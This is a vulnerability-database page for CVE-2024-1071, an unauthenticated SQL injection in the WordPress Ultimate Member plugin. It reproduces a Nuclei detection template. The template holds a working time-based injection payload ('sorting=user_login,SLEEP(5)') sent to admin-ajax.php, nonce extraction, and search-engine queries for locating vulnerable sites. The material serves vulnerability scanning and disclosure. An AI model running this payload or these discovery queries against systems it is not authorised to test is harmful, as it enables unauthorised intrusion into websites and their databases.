Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2024-1071
HistoryFeb 29, 2024 - 3:29 a.m.

WordPress Ultimate Member 2.1.3 - 2.8.2 – SQL Injection

2024-02-2903:29:02
ProjectDiscovery
github.com
39
wordpress
ultimate member
sql injection
security
vulnerability
user profile
registration
login
member directory
content restriction
membership plugin

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.5

Confidence

High

EPSS

0.001

Percentile

26.9%

The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘sorting’ parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
id: CVE-2024-1071

info:
  name: WordPress Ultimate Member 2.1.3 - 2.8.2 – SQL Injection
  author: DhiyaneshDK,iamnooob
  severity: critical
  description: |
    The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘sorting’ parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  remediation: Fixed in 2.8.3
  reference:
    - https://www.wordfence.com/blog/2024/02/2063-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-ultimate-member-wordpress-plugin/
    - https://securityonline.info/cve-2024-1071-wordpress-ultimate-member-plugin-under-active-attack/
    - https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.8.2/includes/core/class-member-directory-meta.php?rev=3022076
    - https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.8.2/includes/core/class-member-directory-meta.php?rev=3022076#L666
    - https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.8.2/includes/core/class-member-directory-meta.php?rev=3022076#L858
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-1071
    cwe-id: CWE-89
    epss-score: 0.00063
    epss-percentile: 0.26569
  metadata:
    verified: true
    max-request: 2
    framework: wordpress
    fofa-query: body="/wp-content/plugins/ultimate-member"
    publicwww-query: "/wp-content/plugins/ultimate-member/"
    zoomeye-query: app:"WordPress Ultimate Member Plugin"
  tags: cve,cve2024,ultimate-member,wpscan,wordpress,wp-plugin,sqli

http:
  - raw:
      - |
        GET /?p=1 HTTP/1.1
        Host: {{Hostname}}

      - |
        @timeout: 10s
        POST /wp-admin/admin-ajax.php?action=um_get_members HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        directory_id=b9238&sorting=user_login,SLEEP(5)&nonce={{nonce}}

    host-redirects: true

    matchers:
      - type: dsl
        dsl:
          - 'duration_2>=5'
          - 'status_code_2 == 200'
          - 'contains_all(body_2, "current_page", "total_pages")'
        condition: and

    extractors:
      - type: regex
        name: nonce
        part: body
        group: 1
        regex:
          - '"nonce":"([0-9a-z]+)"'
        internal: true
# digest: 490a0046304402204dce0d46e23a96c4332c7141fb7eebb00ac6384853aaf8343276fe89d847988a022015a2c24b11feaf9425e5dd850e00a5ccff4ee8901419f9226029090d885ac9b9:922c64590222798bb761d5b6d8e72950

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.5

Confidence

High

EPSS

0.001

Percentile

26.9%